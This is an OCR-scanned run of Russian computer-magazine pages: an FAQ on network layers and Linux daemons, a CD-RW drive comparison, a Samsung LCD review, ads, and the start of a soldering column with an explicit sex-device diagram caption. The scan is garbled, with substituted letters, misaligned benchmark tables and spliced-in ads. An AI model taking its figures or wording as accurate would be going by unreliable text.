(http://copol.narod.ru/hakraz- 
noe4.htm). 

На транспортном и сетевом уров- 
не живут всеми любимые протоко- 
лы TCP/IP, NetBIOS. Через эти про- 
токолы хакеры прокладывают тун- 
нели, DOS'AT, сканят, получают 9до0с- 
туп к ресурсам (заметь, чем выше 
протокол, тем больше уязвимос- 
тей). В Вынь за настройки TCP/IP 
отвечает «Протокол Интернета - 
TCP/IP», а 3a NetBIOS - «Клиент Се- 
тей Microsoft», все они, естествен- 
но, привязаны к «Адаптеру удален- 
ного соединения». Конфигурирова- 
ние TCP/IP в Линь происходит тем 
же ifconfig. Для работы с NetBIOS в 
Лине используется демон smbd. 

За базы данных, меб-сервисы, 
почтовые сервисы и тому подобные 
вещи в Вынь отвечают специаль- 
ные программы, а в Линь - демоны. 
Это уже прикладной уровень моде- 
ли ISO/OSI. 

Как видишь, операционку не так- 
то просто разложить по семи уров- 
ням модели сетевого взаимодей- 
Ствия. 


Кто такие 
демоны? 


Так в Лине называют фоновые 
программы, отвечающие за опреде- 
ленные функции. Проще всего де- 
мон отличить по последней букве в 
названии программы: httpd, smbd и 
так далее. Важная особенность де- 
мона в том, что при изменении ка- 
ких-либо настроек его необходимо 
перезапускать. Кстати, в серверных 
программах Вынь тоже обычно есть 
две кнопочки: пустить сервер, оста- 
новить сервер. Действительно, лю- 
бое серверное приложение должно 
исполняться постоянно (в фоновом 
режиме), неважно - в Linux или в 
Windows. Минус Вынь в том, что мы 


не можем отключить графический 
интерфейс и таким образом высво- 
бодить дополнительные ресурсы 
для демонов, в Линь можно вооб- 
ще не включать графику. Потому- 
то простые операции типа 1Р-марш- 
рутизации может выполнять под 
кастрированным Линем даже gpeB- 
ний 486 комп. Подробнее о сетевых 
демонах nog Linux: http://www.del- 
phimaster.ru/articles/kylix3/index. 
html. 


Что такое 
«уровень 


безопасности 
С2»? 


Это один из уровней безопасности 
информационных систем, 
разработанных Министерством 
обороны США 
(http://dsvolk.msk.ru/oracle/ 
security/standarts.htm). C2 требует 
защиты памяти, выделенной под 
процесс, возможности управления 
ресурсами, индивидуального 
подхода к каждому пользователю и 
тому подобное. Однако здесь - 
http://www.fact400.ru/ 
ms_security.htm - можно прочесть, 
что все Windows, начиная с WIN95, 
соответствуют этому уровню. Вот и 
думай, достаточно ли этого. И еще 
ссылка на тему: http://a-zzz. 
narod.ru/windows/06-3_win- 
dows_2000_xp.htm. 


На каких языках 
пишут 


скрипты для 
Вынь и Линь? 


Для каждой операционки есть 
свой язык командной строки обо- 
лочки (shell), различие в том, что у 
Linux может быть несколько шел- 
лов и у каждого язык со своими 
нюансами. Большинство языков 
тем и хороши, что они трансплат- 
форменные, то есть не важно, ка- 
кая ось, главное, чтобы интерпре- 
татор стоял. Это может быть Perl, 
PHP, JavaScrip, VBScript и так да- 
лее. Соответственно, и хакеру 
большой разницы нет, какую 
ошибку в РНР эксплуатировать: 
nog Windows или под Linux. 


А 
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убрика HARD - это 

тесты и обзоры 
железа, описание и раз- 
бор самых передовых 
хардверных технологий, 
а также радиолюбимая 
радиорубрика всех ради- 
олюбителей и электрон- 
щиков - Паяльник Док- 
тора Кода. 


Content: 


ПРОЖИГАТЕЛИ 


ЖИЗНИ 


ТЕСТИРОВАНИЕ CD-RW ПРИВОДОВ 


test_lab 


С тех пор как появились и стали широко производиться 


(test_lab@gameland.ru) МЕДА CD-ROM и CD-RW вертушки прошло не так уж 
я много времени. Деды-хакеры, наверно, помнят те времена 
(92 - 95 г.г. прошлого века =)), когда обычный CD-ROM 
был всем в диковинку и стоил огромных денег, поэтому не 
водился у среднестатистического пользователя. 


ерелистывая журналы тех лет, 
я наткнулся на такую фразу: 
«Если вы можете позволить 
себе такую роскошь, как 4х 
CD-ROM...». Какая боль! Как же бедняге-авто- 
ру хотелось иметь этот несчастный 4x CD- 
ROM! 


ЗАКАТ ЭРЫ ДИСКЕТ 

Действительно, тогда большая часть сосфта 
распространялась на дискетах, в том числе го- 
рячо (не) любимые тобой Винды. Причем ко- 
личество дискет с дестрибами росло просто 
сумасшедшими темпами. И если в дистрибути- 
ве 95-ой Винды флоппиков было не так уж и 
много, то установка полуоси стала для меня 
первым ночным кошмаром (38-я дискета ока- 
залась «битой», и пришлось все начинать 
сначала). Если же требовалось слить у соседа 
что-то большое, то в доме выскребались все 
флопари go единого или сразу тащили вин- 
честер. В общем, тогда стало понятно, что не- 
обходимо что-то более емкое, быстрое да и 
более надежное, чем дискеты, и в то же время 
более простое и распространенное, чем ZIP'bI, 
JAZZ'bI, стримеры и прочая мишура. 

В широкой продаже первые CD-RW появи- 
лись в 1995 году, а стоили они тогда поряд- 
ка тысячи бачей за внутренний 2X CD-RW. 
И такая большая цена на пишущие приво- 


Asus Mitsumi Asus 


CRW-5224A BOX CR-487ETE CRW-5224A 


ды держалась довольно-таки долго: три го- 
да назад хороший резак нельзя было ку- 
пить дешевле 150-200 безусловных egu- 
ниц. Сейчас цены на вышеозначенную про- 
дукцию стали воистину мизерными. Ведь 
всего за 50 у.е. можно купить вполне при- 
личный современный драйв. 

Многие могут возразить, что уже появились 
DVD-RW, но всему свое время, дойдет дело и go 
них. А пока самыми актуальными по цене и 
распространенности остаются обычные резаки. 


МЕТОДИКА ТЕСТИРОВАНИЯ 

На каждом резаке была записана технологи- 
ческая болванка. Технологические СР-К’ки бы- 
ли выбраны не случайно - ведь эти болванки 
отличаются не только низкой ценой, но и, как 
правило, отвратительным качеством. Такая 
болванка является настоящим испытанием 
для любого резака и хорошо показывает каче- 
ство драйва. После записи болванка возвра- 
щалась записавшему ее драйву, и проводился 
тест качества прожига. За этим испытанием 
следовало новое: чтение древнего поцарапан- 
ного сидюка. Естественно, у каждого устрой- 
ства имеются особенности. Какой-то привод 
отличается повышенным уровнем шума, дру- 
гой - размерами, а третий - дизайном и комп- 
лектацией. Все это мы суммировали в отдель- 
ном показателе и учли его в резюме. 


Samsung LG Mitsumi SONY TEAC 
SW-252 GCE-8520B CR-485FTE САХ: 220  CD-W552E 


SEEK TIMES 


Random Seek 89 ms 8ims 108 ms 


1/3 Seek 96 ms Пиз 126 ms 


Full Seek 147 ms 127ms 190 ms 


89ms 95ms 58ms 915 92 ms 
98т5 105ms 67ms 94ms 95 ms 
159 м5 162ms 108ms 142ms 159 ms 


INTERFACE 


Burst Rate 17 MB/s  2MB/s  1MB/s 


2MB/s 2MB/s 16MB/s 19MB/s 17 MB/s 


SPIN UP/DOWN TIME 


Spin Up Time O10sec 3.32sec 1.44 sec 


Spin Down Time 4.87 зес 3.97sec 41sec 


Disc Eject Time 2.36sec 1.29sec 2.53 sec 
Disc Load Time 1.55 зес 0.84 зес 1.64 sec 


2.05 зес 4.06 зес 1.66 $ес 0.07 ес 0.30 sec 
3.50 sec 4.57 зес 0.01 ес 3.49 зес 5.05 sec 


1.43 зес 1.65 зес 1.51зес 1.61 5ес 2.40 sec 
112 зес 1.46 зес 1.01 ес 149sec 1.53 sec 


Disc Recognition Time 0.18 зес 6.82 зес 13.83 зес 6.00 зес 12.30 sec 10.65 зес 7.95 зес 14.31 sec 
TRANSFER RATE 


Start 24.01x 23.68x  23.84x 
End 52.43x 50.76x  49.27х 
Average 39.33х 38.82х  39.07x 


18.77x 18.86х 21.38x 19.36х 23.93х 
40.23х 29.37х 38.95х 40.32х 45.45x 
30.77x 30.63х 33.5х 30.85x  38.96х 


CPU USAGE 


К 0% 0% 0% 
x 1% 1% 1% 
AX 3% 3% 3% 
8X 6% 5% 6% 


1% 0% 1% 1% 0% 
2% 1% 2% 1% 1% 
3% 3% 4% 2% 3% 
1% 5% 7% 5% 6% 


ТЕСТОВЫЙ СТЕНД 

Для тестирования приводов была выбрана достаточно типич- 
ная конфигурация: 

мать - Asus A7V-133C; 

процессор - Athlon ХР 1500 МГц; 

память - 512 Мб РС133 SDRAM; 

видюха - Radeon 8500 le; 

винт - WD 1200jb 120 Гб. 


ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ 

Nero Burning Rom 
Известная программа для записи дисков. Поддерживает прак- 
тически все существующие форматы записи, имеет много ин- 
тересных настроек. 


Nero InfoTool 
Эта софтина считывает из ВЮ5'а привода его основные характе- 
ристики. С помощью нее мы протестили устройства на совмести- 
мость с основными стандартами современных оптических носите- 
лей, а также выявили некоторые технические нюансы, такие как 
размер буфера и версия прошивки. 
Рекомендуем опытным покупателям использовать эту программу 
для проверки приобретаемого драйва, чтобы не покупать «кота в 
мешке». Для использования достаточно подключить дисковод к 
компьютеру и запустить InfoTool.exe прямо с дискетки. 


Nero CD Speed (1.02) 
Утилита для проверки поддержки традиционных форматов. При 
конфигурировании своего компа юзер стремится не только по- 
лучить доступ к нововведениям, но и сохранить поддержку ста- 
рых технологий. Конечно, переход на четырех- и более гигабайт- 
ные П\/)-носители очень привлекателен для производителей 
игр, кино, крупных программных комплексов, однако до сих пор 
подавляющее большинство информации распространяется на 
обычных компактах. А музыкальные альбомы вообще не требу- 
ют больших объемов (если только это не сборники), то есть ау- 
дио еще долго будет оставаться на обычных CD. 


ГРАФИКИ 

Стоит объяснить, что показано на графиках: 

- зеленая ветка - Transfer Rate, то есть скорость считывания 
данных; 

- желтая ветка - скорость вращения диска; 

- поле Speed - скорость передачи данных: average (средняя), 
start (начальная) и end (конечная). 

Дисковод работает в режиме CAV (Constant Angular Velocity), 
то есть с постоянной угловой скоростью, поэтому график 
выглядит именно так: желтая линия прямая, то есть диск вра- 
щается с постоянной скоростью, зеленая линия показывает, 
что скорость передачи данных растет. Это происходит пото- 
му, что ближе к краю радиус диска больше, так что за то же 
время лазер проходит большую поверхность и больше успе- 
вает считать. 


Этот рекордер поставляется в коробочном варианте. Помимо де- 
вайса в коробке было найдено две болванки, комплект винтиков и 
шнуров и диск с сосфтом. Резак имеет симпатичный дизайн, сделан 
просто и со вкусом. На передней панели имеются две кнопки (play 
иеесь - это весьма удобно и нечасто встречается в современных 
драйвах. Также имеется разъем для наушников, регулятор громкос- 
ТИ И gBa индикатора: read и write, что тоже довольно удобно, так 
как всегда известно, чем занят драйв в данный момент. 


Asus 5224А RTL: 
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a sho ИНТЕРНЕТ-МАГАЗИН 


http://www.e-shop.ru с ДОСТАВНОЙ HA ДОМ 
БЫСТРО = УДОБНО = ДОСТУПНО 


WarCraft Ш: The Star Wars Tomb Raider: The Dark Age of 


Frozen Throne Galaxies: An Angel of Darkness Camelot: Gold 
Empire Divided Edition 


+: 
Grand Theft Auto: ims: Silent Hill 2 
Vice City 


The Matrix ; 
Enter The Matrix 


Neverwinter Metal Gear Deus Ex 2: Republic: 
Nights: Shadows Solid 2: Substance Invisible War The Revolution 
of Undrentide (DX2) 
Заказы по интернету — круглосуточно! e-mail: sales@e-shop.ru 
аказы по телефону можно сделать 
с 10:00 до 21.00 слленедельника по пятницу 
с 10:00 до 19.00 @ субботы по воскресенье 
СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ: 
стоимость доставки == снижена на 10%! 


(095) 928-6089 (095) 928-0360 (095) 928-357 


е-5Пор ° Tere #7(32) 


А! Я ХОЧУ ПОЛУЧАТЬ БЕСПЛАТНЫЙ 
= КАГАЛОГРС ИГР 


ИНДЕКС. ГОРОД 


УЛИЦА Дом КОРПУС КВАРТИРА 


ФИО 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 


ОЗы 4hack 


НАВО/ПРОЖИГАТЕЛИ ЖИЗНИ 


Редакция вы- 
ражает благо- 
дарность ком- 
пании «Остров 
Формоза» 
(тел. 728- 
4004) за пре- 
доставленное 
оборудование 


Asus 5224A RTL 


От опустошения буфера девайс защищен технологи- 
ей FlextraLink. Привод имеет 2 Мб буфер. Версия про- 
шивки - 1.20. 

По шумовым характеристикам резак показал себя не с 
лучшей стороны. Лоток выезжает медленно и с против- 


Mitsumi CR 487 ETE 


Как по дизайну, так и по функциональности девайс 
очень простой - никаких излишеств. На передней пане- 
ли имеется кнопка eject (довольно жесткая), гнездо для 
наушников, регулятор громкости и индикатор работы. 

Буфер в этом резаке защищен от опустошения тех- 
нологией Exaclink. Также имеется 2 Мб буфер. Версия 
прошивки - 0019. 

Лоток выдвигается быстро и бесшумно, заезжает то- 
же мягко и без грохота. Девайс показал лучшее время 


ным лязгом, во время записи имеет место довольно силь- 
ный шум, переходящий иногда в свист. 

Ровно за три минуты драйв записал 625 Мб данных, пока- 
зав наилучший результат в тестировании. Проверка качест- 
ва записи не показала никаких недостатков: не было обна- 
ружено ни одной ошибки. А вот в тесте с поцарапанным 
диском не все так хорошо: на графике видно, что с неболь- 
шими царапинами в начале и середине диска драйв спра- 
вился без проблем и даже не снизил скорость, а вот на глу- 
бокой царапине в конце диска ему пришлось резко притор- 
мозить. После прохождения проблемного участка умный де- 
вайс стал постепенно (именно постепенно, а не резко) Nog- 
нимать скорость. Судя по всему, алгоритм работы драйва 
(читай прошивка) очень хорошо продуман, потому что, хоть 
резак и шумит, но показывает очень хорошие результаты. 

Как видно из таблицы, в общем драйв показал средние ре- 
зультаты. Единственное, чем он выделился, это время раск- 
рутки диска: оно составляет всего одну десятую секунды. 

Единогласным решением редакции девайс удостоился 
награды «Лучшая покупка» за лучшее соотношение 
цена/качество. 
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по скорости загрузки и выгрузки диска в тестировании. 

Весь процесс записи занял 3,11 мин. При этом драйв 
абсолютно не шумел. Во время прожига буфер резака 
ни разу не опустошался. После проверки записанной 
болванки стало понятно, что с чтением проблем тоже 
нет - читалась она идеально. 

Тест с поцарапанным диском драйв прошел среднень- 
ко: проблемы начались только в конце диска на глубо- 
кой царапине. Тем не менее, резак с диском справился и 
дочитал его до конца, не став поднимать скорость чте- 
ния. С одной стороны, это хорошо, так как малая ско- 
рость предупреждает возникновение ошибок чтения 
плохого диска, но с другой - если диск поцарапан только 
в начале, а остальная часть - в идеальном состоянии, не- 
оправданное чтение на сниженной скорости взбесит да- 
же святого. В защиту привода можно сказать, что этот 
баг легко исправляется новой прошивкой - в тестируе- 
MOM драйве залита сыроватая версия. 


ASUS CRW-5224A OEM 
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Несмотря на TO, что названия моделей рекордеров совпа- 
дают, это два совершенно разных девайса. Вообще, непо- 
нятно, почему эти модели получили одинаковые наиме- 
нования. Ведь этот резак поставляется в ОЕМ варианте и 
по всем параметрам отличается в худшую сторону от тез- 
KU. Эта модель имеет точно такой же корпус, как и пер- 
вая, но на этом сходства заканчиваются. Панелька реза- 
ка имеет совершенно другой, более простой дизайн, тоже 
присутствуют кнопки play и eject, есть гнездо для науш- 
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ников и регулятор громкости, но индикатор уже один. Начинка 
девайса, по всей видимости, тоже другая. 

В качестве защиты от опустошения буфера также служит 
технология FlextraLink. Буфер девайса - 2 Мб. Версия про- 


шивки - 1.0. 


Лоток шумный и медленный. Во время работы привод страш- 
но шумел и от вибраций упорно сползал с тестового стенда. 

Болванка записалась за 3,3 минуты. Тест чтения записанной 
болванки показал, что по качеству записи эта модель не усту- 
пает коробочной, а вот с чтением поцарапанных дисков все 
намного хуже. Конечно, девайс все же смог прочитать диск, 
но ошибок при этом допустил на порядок больше. 

Итак, привод показал очень средние результаты, но, тем не 
менее, не самые плохие в тестировании. 


Этот девайс сразу порадовал 
симпатичным дизайном: корпус 
драйва сделан довольно каче- 
ственно, придраться просто не 
к чему. Фейс резака достаточно 
симпатичен и в то же время 
сделан без излишеств. На нем 
имеется разъем для наушников, 
регулятор громкости и кнопка 
eject (очень неплохо совмещен- 
ная с двухцветным световым 
индикатором, который приколь- 
но смотрится в темноте). 

Защиту от опустошения бу- 
qpepa обеспечивает техноло- 
rua Justlink. У Самсунга са- 
мый большой объем буфера: 
аж 8 Мб. Благодаря этому об 
опустошении буфера не мо- 
жет быть и речи. В данной 
модели установлена версия 
прошивки bvO5. 

Резак очень и очень тихий, 
причем тихий во всем. Лоток 
выезжает и заезжает быстро, 
но плавно и бесшумно. В про- 


цессе работы вообще ничего 
не слышно: то, что девайс 
чем-то занят, можно опреде- 
лить только по индикатору. 

Болванка записалась за 3,33 
минуты. Проверка качества по- 
казала, что все данные прекрас- 
но читаются, никаких проблем 
нет. Больше всего поразили ре- 
зультаты чтения поцарапанного 
диска: он прочитался идеально! 
Ни одной заминки, ни одной 
ошибки! Результаты этого теста 
действительно лучшие в тести- 
ровании. Даже удивительно - 
ведь диск довольно сильно по- 
царапан, а этот драйв прочел 
его практически как новый. 

По различным скоростным 
характеристикам девайс пока- 
зал средние результаты, но, на 
наш взгляд, это нисколько не 
уменьшает его преимуществ. 
За полную тишину в процессе 
работы и отличные показатели 
записи и чтения данный де- 
вайс удостоен награды «Выбор 
редакции». 
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Samsung SW 252: чтение 
поцарапанной болванки... 
Идеально! 
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Футболка (GL) "Hack OFF" 
с логотипом "Хакер", черная 


Футболка "Хакер Inside": 


—. 


Куртка ветровка (GL) 
"FBI" с логотипом 
"Хакер": 
темно-синяя, черная 


WELCOME 


Опасно для : черный 
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LG GCE-8520B 


Pekopgep имеет простой, но приятный дизайн: мордоч- 
ка выполнена в серо-белых тонах и очень хорошо 
смотрится. Корпус сделан также хорошо, никаких заме- 
чаний нет. На передней панели имеется гнездо для на- 
ушников, регулятор громкости, кнопка eject (довольно- 
таки жесткая) и индикатор работы. 


ODETTE 


LG GCE-8520B: 


LG GCE-8520B: чтение поцарапанной болванки 


чтение записанной болванки 


Лоток очень тихий (при приеме и возврате диска неп- 
риятный шум отсутствует), но медленный. Пишет и чита- 
ет драйв тоже очень тихо: гула и свиста не замечено. В 
девайсе установлен 2Мб буфер. Прошивка - версии 1.0. 

В том, какая технология защищает буфер драйва от 
опустошения, он не признался. Мего просто сказала, что 
защита от опустошения активирована и началась запись. 

Диск был записан за 3,03 минуты. Как выяснилось в 
процессе проверки, этот драйв первый в тестировании, 
не очень хорошо справившийся со своими прямыми 
обязанностями. Большая часть диска была записана 
нормально, а вот в конце появились ошибки, и ско- 
рость пришлось сбросить (это видно на графике). Поч- 
ти такая же история получилась и с поцарапанным дис- 
ком: ошибки появились только в конце, на самой боль- 
шой царапине, более мелкие дефекты были пройдены 
им без проблем. По скоростным характеристикам де- 
вайс тоже показал средний результат. 


MITSUMI CR-485FTE 


Mitsumi CR-485FTE 


С рекордерами этой фирмы сложилась ситуация, 
очень похожая на ситуацию с драйвами фирмы Asus: 
второй девайс - практически полная противополож- 
ность первого. 

Первое, что бросилось в глаза: привычная наклейка с 
информацией о драйве почему-то наклеена снизу, а не 
сверху, как обычно. Передняя панель на редкость неза- 
мысловатая. Своей угловатостью дизайн фейса напоми- 
нает первые односкоростные сидюки. На ней имеется 


разъем для наушников, (| 
регулятор громкости, ы 
кнопка eject и индикатор 
работы. Кнопка жесткая, 
индикатор очень ма- 
ленький, если на девайс 
падает прямой свет, да- 
же и не видно, светится 
индикатор или нет. Ло- 
ток очень тихий, но не 
слишком быстрый, в про- 
цессе работы шума тоже замечено не было. 

Защита от опустошения буфера обеспечивается тех- 
нологией Exaclink. Буфер стандартный - 2 Мб. Установ- 
лена прошивка версии 4.0B. 

Первый диск драйв оперативно угробил, записав лишь на- 
половину, на вторую болванку он потратил целых 5 минут. 
Тестирование наглядно показало, что этот драйв не дружит 
с технологическими болванками и писать их не хочет ни в 
какую. Как видишь, грасфик весьма кривой. По всей види- 
мости, при записи резак наткнулся на плохое место и не 
смог с ним справиться. Дальше на графике видно, что пос- 
ле прохождения проблемного участка скорость снова под- 
нялась. Послесбний тест подписал этому девайсу оконча- 
тельный приговор: драйв наотрез отказался читать поцара- 
панный диск, а вместо чтения упорно, наглухо вешал систе- 
му. Ребутнуть компьютер после этого можно было только 
ресетом. В оправдание можно сказать, что этот драйв пока- 
зал самые хорошие результаты по поиску (seek). 


Дизайн этого драйва весьма похож на дизайн первого 
Mitsumi, это относится и к корпусу, и к передней панели. 
На панельке также есть кнопка eject, гнездо для наушни- 
ков, регулятор громкости и индикатор работы. Несмотря 
на некоторую схожесть, девайс OT SONY смотрится нам- 
ного лучше. Каких-либо выдающихся особенностей ди- 
зайна у этого резака нет. Единственное, что можно отме- 
тить, - это слишком глубоко посаженный регулятор гром- 
кости, крутить который неудобно. 

О своей технологии защиты буфера этот резак тоже 
ничего рассказывать не захотел: «защита от обнуле- 
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ния буфера активирована», и Ha этом все. В девайсе 
установлен 2 Мб буфер. Версия прошивки - 6У$1. 

Лоток у драйва медленный, но тихий - при загрузке 
диска не громыхает. Работает драйв тоже очень тихо, 
никакого шума не наблюдалось. 


ПОВОПОСООТ 


SONY СРХ220Е1; SONY СРХ220Е1: 


чтение записанной болванки 


чтение поцарапанной болванки 


SONY CRX220E1 


Болванка была записана 
быстро, за 3,01 минуты (вто- 
рой результат после драйва 
от Asus). Тестирование дан- 
ных не показало никаких отк- 
лонений: болванка прекрасно 
читалась, никаких ошибок не 
было. В последнем тесте ре- 
кордер тоже показал очень 
неплохие результаты. Ошиб- 
ки, конечно, были, но «по ми- 
нимуму». В целом, он прошел 
этот тест очень неплохо. Как 
ни странно, без проблем бы- 


ла пройдена и глубокая цара- 
пина при тесте на чтение пло- 
хого диска. Вообще, если пос- 
мотреть на графики чтения 
поцарапанного диска, то мож- 
но подумать, что тесты про- 
водились на разных приво- 
дах, хотя девайс был один и 
тот же. Это наглядно показы- 
вает, насколько различаются 
между собой разные драйвы. 

Этот рекордер показал 
очень неплохие результаты 
по всем тестам. 


Этот резак сделан достаточно 
качественно. Единственный 
внешний недостаток заклю- 
чается в том, что надписи на 
задней панели плохо видно. 
Дизайн мордочки вызывает 
противоречивые чувства: с 
одной стороны, она какая-то 
угловатая, с другой - выгля- 
дит очень приятно. Кроме 
стандартного набора разъе- 
мов и кнопок девайс имеет 
два индикатора работы, от- 
дельно для записи и чтения 
(какиу ASUS). От опустоше- 
ния буфера девайс спасает 
технология Burn proof. Раз- 
мер Oycpepa - 2 Мб. Версия 
прошивки - 1.05. 

Лоток у драйва не шумный, 
но самый медленный в тести- 
ровании, а вот в процессе 
работы девайс шумит, хотя и 
не сильно. 

Болванку Теас записал отно- 
сительно медленно - за 3,21 
минуты. По графику ее чтения 
видно, что резак тоже недо- 
любливает технологические 
болванки - в конце диска он 


Teac CD-W552E: 
чтение записанной болванки 


Teac CD-W552E 


все же сорвался. Вообще, BO 
время записи было заметно, 
что рекордер пишет болванку 
как-то неуверенно, то увели- 


чивая, то уменьшая скорость. 

В процессе чтения поцара- 
панного диска девайс без 
проблем прошел небольшие 
царапины, а вот с глубокой 
возникла проблема. Тем не 
менее и она была пройдена, 
хотя драйв все время пытался 
поднять скорость, вместо того 
чтобы дочитать плохой диск 
на пониженных оборотах. В 
общем, этот рекордер на сей 
раз не оправдал своего имени 
и показал не очень хорошие 
результаты. 

Стоит сказать, что на нем за- 
писывались две болванки: в ре- 
жиме UDMA и без него. Резуль- 


таты оказались идентичны. 


UTIL 


Teac CD-W552E: 


чтение поцарапанной болванки 
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HARD/SAMSUNG SyncMaster 192T 


КАЧЕСТВЕННЫЙ LCD 


SAMSUNG SYNCMASTER 192T 


test-lab (test_lab@gameland.ru) 


Любой мони- 
тор выдает 
цвета не 
очень точно, 
его график 
не линей- 
ный, а пара- 
болический. 


раде СЕЙ 


В очередной раз брошен вызов мониторам на базе электронной лучевой трубки (ЭЛТ). 


В наших руках новый 19-дюймовый жидкокристаллический (ЖК) дисплей SAMSUNG 
SyncMaster 192Т. Вообще, приготовься к тому, что CRT (Cathode Вау Tube) скоро 
совсем уйдут в прошлое, поскольку основные деньги в бизнесе производства 
мониторов разработчики получают за LCD (Liquid Crystal Display). 


акие же преимущества 
дает LCD-gucnnen? На 
первом месте для go- 
машнего пользователя - компакт- 
ность. Один приятель недавно купил 
себе CRT 17", поймал такси и столк- 
нулся с тем, что монитор не влезает 
в «Волгу». Водителю пришлось отк- 
ручивать дверь на машине, чтобы 
утрамбовать коробку с покупкой и 
покупателя вглубь машины. 

19-дюймовый ЭЛТ займет большую 
часть твоего стола, если не весь. В 
случае с LCD-gucnneem размер nogc- 
тавки не отличается для 15- и 19- 
дюймовых моделей. То есть при рос- 
те по диагонали матрица остается 
такой же плоской и не съедает дра- 
гоценное рабочее пространство на 
твоем столе. SAMSUNG SyncMaster 
192Т можно даже повесить на стену 
с помощью специального штатива, 
который идет в комплекте. 

До недавнего времени у ЖК-мат- 
риц существовала масса проблем: 
запаздывание матрицы, угол обзо- 
ра, цветопередача, яркость и конт- 
раст. Почти все эти проблемы ре- 
шены уже очень давно. У SAMSUNG 
SyncMaster 192T запаздывание 25 
мс - эта задержка приближается к 
инертности люминофора электрон- 
но-лучевой трубки. То есть задерж- 
ки почти не чувствуется. Угол обзо- 
ра 170 на 170 градусов позволяет 
смотреть на экран практически с 
любой точки, однако экран еле за- 
метно переливается при каждом 
движении головы и глаз. Зато ТЕТ 
(Thin Film Transistor) - мониторы не 
мерцают, поскольку каждый эле- 
мент хранит свое состояние до по- 
явления нового сигнала. 


» 
На графиках сравниваются LCD и CRT мо- 
нитор. Каждый цвет (красный, зеленый, 
синий) с коррекцией в идеале должен 
быть прямым и идти из угла в угол. Пара- 


бола - отображает стандартную цветопе- 
редачу без коррекции с учетом гаммы. 
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Единственная проблема, которая 
находится на стадии решения, - это 
цветопередача. Дело в том, что 
применение в ЕСО-мониторах поля- 
ризационных фильтров и игр с по- 
ляризованным светом делает 
спектр неравномерным. Чтобы про- 
тестировать SAMSUNG SyncMaster 
192T на цветопередачу, мы исполь- 
зовали колориметр РАМТОМЕ 
ColorVision SpyderPRO с програм- 
мным обеспечением OptiCAL. Дат- 
чик колориметра закрепляется на 
экране монитора, а программное 
обеспечение подает испытатель- 
ные сигналы на монитор, а затем 
сравнивает с результатами измере- 
ний. Любой монитор выдает цвета 
не очень точно, его график не ли- 
нейный, а параболический. Это зна- 
чит, что выходная яркость каждого 
цвета равна входной яркости, воз- 
веденной в степень «гамма». То 
есть мы получаем не ту яркость, ко- 
торую хотели, а искаженную возве- 
дением в степень. Чем меньше гам- 
ма, тем парабола прямее - больше 
похожа на линию, тем точнее цве- 
топередача. У LCD мониторов гам- 
ма традиционно побольше, чем у 
CRT. Поэтому некоторые не оптими- 
зированные для отображения на 
мониторе фотографии выглядят ху- 
же на ЖК, чем на ЭЛТ. 

Но это не единственная беда, де- 
ло в том, что у многих ТЕТ-диспле- 
ев график далек от параболы, то 
есть он изгибается неприятными 
буграми и пучностями, что делает 
отображение цветов непредсказуе- 
мым. Для наглядности наше прог- 
раммное обеспечение преобразова- 
ло параболы каждого цвета в три 
линии за счет коррекции. Мы реши- 
ли сравнить жидкокристаллический 
SAMSUNG SyncMaster 192T с элект- 
роннолучевым SAMSUNG 
SyncMaster 957МВ. Конечно, на гра- 
фике цветопередачи с коррекцией 
есть небольшой горбик в самом на- 
чале. Однако общая картина гово- 
put о том, что SAMSUNG SyncMaster 
192Т отображает цвета почти так 
же корректно, как ЭЛТ-монитор. 
При этом некоторые цвета даже по- 
ярче ЭЛТ. 


SAMSUNG SyncMaster 192T 


Конечно, мы забыли сказать о 
том, что новейшие мониторы LCD 
дадут фору CRT по яркости и конт- 
растности. SAMSUNG SyncMaster 
192T дает 250 кандел Ha квадрат- 
ный метр (если поставить яркость 
на максимум, кажется, что смот- 
ришь на лампу). Причем светлый 
участок может быть в 500 раз ярче 
(контрастнее) темного (обычный 
уровень контрастности 40011). Не 
надо забывать, что ЖК-дисплей 
традиционно отличается практичес- 
ки идеальными: геометрией, фоку- 
сировкой и сведением. А эти пара- 
метры также сильно влияют на 
просмотр фотографий. То есть в 
ближайшем будущем есть надежда, 
что мониторы на тонкопленочных 
транзисторах (ТЕТ) будут отобра- 
жать фотографии даже лучше, чем 
электроннолучевые. 


Мы можем рекомендовать этот мо- 
нитор не только для работы с 
офисными приложениями, но и для 
игр, аля просмотра фильмов и фо- 
тографий. И, конечно, он очень 
подходит для черчения. Цифровой 
видеовход DVI позволит избежать 
проблем с размытостью пикселей в 
буквах и линиях. 


HARD/PAYALNIK ДОКТОРА ДОБРЯНСКОГО 


ОЗы 4hack 


Сделал де- 

вайс - упакуй 
его в корпус, 
вообще начи- 
нать лучше с 
корпуса, ина- 
че твое тво- 
рение прев- 
ратится в 
обычный ра- 
диохлам и 
осядет в 
пыльном уг- 
лу. 


page СЕТ 


Dr.Cod@real.xakep.ru 


PAYALNIK ДОКТОРА 
ПОБРЯНСКОГО 


ПОРЦИЯ СУМАСШЕДШИХ ДЕВАЙСОВ 


Если у тебя есть свои радио: -новости; -приколы; -методы; -решения;: -инструменты; 


-устройства; -мнения, - поделись с нами. Прием радиомыслей Ha Dr.Cod@real.xakep.ru 


стречай очередной 
пестрый паяльник 
бурными аплодисмен- 
тами. А для начала - 
сногсшибательная новость: 


Новость: 

Добрянский в paguomarase! 

По пути с очередной презентации 
очередных процессоров я наконец- 
то заскочил в свой любимый paguo- 
магазин! Не скажу, какой, чтобы не 
делать лишней рекламы. Кто знает, 
тот догадается, ведь в Москве не так 
уж и много радиомагазинов. Так вот, 
магаз отремонтировали, и он превра- 
тился в супермаркет. Теперь ты мо- 
жешь полапать радиокомпоненты, 
понюхать, ближе рассмотреть! Сло- 
вом, можно ощутить себя среди ра- 
диодеталей домохозяйкой, которая 
складывает в корзину заморожен- 
ные огурцы и другие полуфабрика- 
ты. Ох, нельзя, нельзя мне с боль- 


1) Водительница дилдобайка; 2) Сиденье 
с отверстием и трубкой; 3) Силиконовый 
вибратор, закрепленный в металличес- 
кой трубе-штативе; 4) Направляющая, 
по которой ездит штатив с dildo; 5) Ша- 
тун (как у паровоза - преобразует вра- 
щательное движение в поступательное); 
6) Шестеренка привода вибратора; 7) 
Цепь привода вибратора; 8) Шестеренка 
педалей 
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шой суммой денег появляться в та- 
ких местах, я сразу вспоминаю, чего 
давно хотел купить: глаза разбега- 
